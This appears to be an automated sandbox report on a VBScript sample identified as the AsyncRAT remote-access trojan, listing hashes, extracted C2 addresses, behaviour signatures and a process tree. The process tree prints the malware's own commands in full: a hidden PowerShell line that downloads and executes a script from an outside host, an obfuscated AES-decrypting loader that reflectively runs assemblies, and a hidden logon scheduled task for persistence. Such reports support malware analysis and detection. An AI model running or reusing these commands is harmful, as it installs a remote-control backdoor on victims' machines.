Overview

overview

10

Static

static

1

407ed762a3...49.vbs

windows7-x64

8

407ed762a3...49.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549.vbs

  • Size

    60KB

  • MD5

    dcaadf5b6a871821a09e8be7f12603b0

  • SHA1

    49c943609633112b80fe7b50c79ca6eb072eb3be

  • SHA256

    407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549

  • SHA512

    e18a9bda8f0efeb8bc490b320f86b14a7bc3fb667af4c193b9159d780aabe11da48bec08a6d605f2f08c65d661b5f8e572bf52e5fd712735196d46ea68a15db8

  • SSDEEP

    1536:akm3NbS839HXCQHXFNx7X+xW7lflsAmPUoLlXBCbB:aLl3pCQ35+EDu3y

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

127.0.0.1:2024

127.0.0.1:15509

127.0.0.1:11979

2.tcp.eu.ngrok.io:6606

2.tcp.eu.ngrok.io:7707

2.tcp.eu.ngrok.io:8808

2.tcp.eu.ngrok.io:2024

2.tcp.eu.ngrok.io:15509

2.tcp.eu.ngrok.io:11979

5.tcp.eu.ngrok.io:6606

5.tcp.eu.ngrok.io:7707

5.tcp.eu.ngrok.io:8808

5.tcp.eu.ngrok.io:2024

5.tcp.eu.ngrok.io:15509

5.tcp.eu.ngrok.io:11979
Mutex

rBBszd57Gkh8

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\407ed762a35023eb5eb69738dd20a7c23ac03e187717029a0712b1826750d549.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4824
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5028
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_332_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx332.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4428
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx332.vbs"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2768
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx332.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4608
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DK2yqtn/8WWLFGdN0SGSXoqb0xwC458hY3mEb0Z8Op4='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Tn8+JuQ0zcIx9j+6ZeLoqQ=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx332.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3820

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    9751fcb3d8dc82d33d50eebe53abe314

    SHA1

    7a680212700a5d9f3ca67c81e0e243834387c20c

    SHA256

    ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

    SHA512

    54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    aa8efa56e1e40374bbd21e0e469dceb7

    SHA1

    33a592799d4898c6efdd29e132f2f76ec51dbc08

    SHA256

    25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf

    SHA512

    ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    18KB

    MD5

    b6833d79251024391cc44d8c83b5e68b

    SHA1

    7590eb021fd662afdb433e8b1b054a71792fbae1

    SHA256

    623c01eb3c0d1307424f6f26a1df16c3397327b78d416b885e2d6bd248ac1b2a

    SHA512

    beb0f4d12639b9ba140bd9996611f9c34a6504a0f492f1d5cd8e166f7856d5711a289514b589b3cfa0b1992c35ef373cb63172da72fe88cdfcfa2bd9c18ef12d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zisxzb4t.1ub.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\system.bat
    Filesize

    53KB

    MD5

    eef9239b6e6433e968d7328eb78e5aa4

    SHA1

    00ea660bb2189b9e43a4fa2c7f971bdee84701f3

    SHA256

    15587d9e6274cbe0c11a4f3c45f80d677d76b74840cbe53ee77e6387808e48c2

    SHA512

    8cc45b3dec7c7bf8f4c2f621bfd531a65a6e457f20a5d0bf887afc4eaa6a2364fa59de60ffdf72dc7950b7a7148261783e959d9c3cf28dcc496f1752501d828d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\latencyx332.vbs
    Filesize

    111B

    MD5

    dbabe4c6df4fad8fb9b83dc549ee7b1f

    SHA1

    ae6624e81ca6676ac959de9f2e29e8153a4e0ef0

    SHA256

    070a7383e7ce8cbfb10f2b208a60379c43f3582c2f7c348f7624e79b274b23bf

    SHA512

    931fbee77c287dac980fc70e75706349bdfb3221b9eb1d35333622e43ba9d46fa82128bc38cba4e6aea4da82e7531a69ce2f525669b66b4c5d0250243c456790

    Download Submit

  • memory/3820-92-0x0000000007260000-0x0000000007272000-memory.dmp

    Filesize

    72KB

    Download

  • memory/4044-38-0x0000000005AC0000-0x0000000005ADE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4044-42-0x0000000006050000-0x0000000006058000-memory.dmp

    Filesize

    32KB

    Download

  • memory/4044-22-0x00000000044F0000-0x0000000004526000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4044-23-0x0000000004BD0000-0x00000000051F8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4044-24-0x0000000005230000-0x0000000005252000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4044-25-0x00000000052D0000-0x0000000005336000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4044-26-0x00000000053F0000-0x0000000005456000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4044-36-0x00000000054D0000-0x0000000005824000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4044-45-0x0000000007F60000-0x0000000008504000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4044-44-0x0000000006E90000-0x0000000006E9E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/4044-39-0x00000000060D0000-0x000000000611C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4044-40-0x0000000007330000-0x00000000079AA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4044-41-0x0000000006020000-0x000000000603A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4044-43-0x0000000006D70000-0x0000000006E0C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4428-68-0x0000000007140000-0x00000000071E3000-memory.dmp

    Filesize

    652KB

    Download

  • memory/4428-70-0x0000000007500000-0x0000000007596000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4428-69-0x0000000007300000-0x000000000730A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4428-56-0x0000000006520000-0x0000000006552000-memory.dmp

    Filesize

    200KB

    Download

  • memory/4428-57-0x00000000711B0000-0x00000000711FC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4428-67-0x0000000006500000-0x000000000651E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4428-71-0x0000000007480000-0x0000000007491000-memory.dmp

    Filesize

    68KB

    Download

  • memory/4824-17-0x00007FFF96930000-0x00007FFF973F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4824-13-0x00007FFF96930000-0x00007FFF973F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4824-0-0x00007FFF96933000-0x00007FFF96935000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4824-16-0x00007FFF96930000-0x00007FFF973F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4824-12-0x00007FFF96930000-0x00007FFF973F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4824-11-0x00007FFF96930000-0x00007FFF973F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4824-6-0x000001CD9BB30000-0x000001CD9BB52000-memory.dmp

    Filesize

    136KB

    Download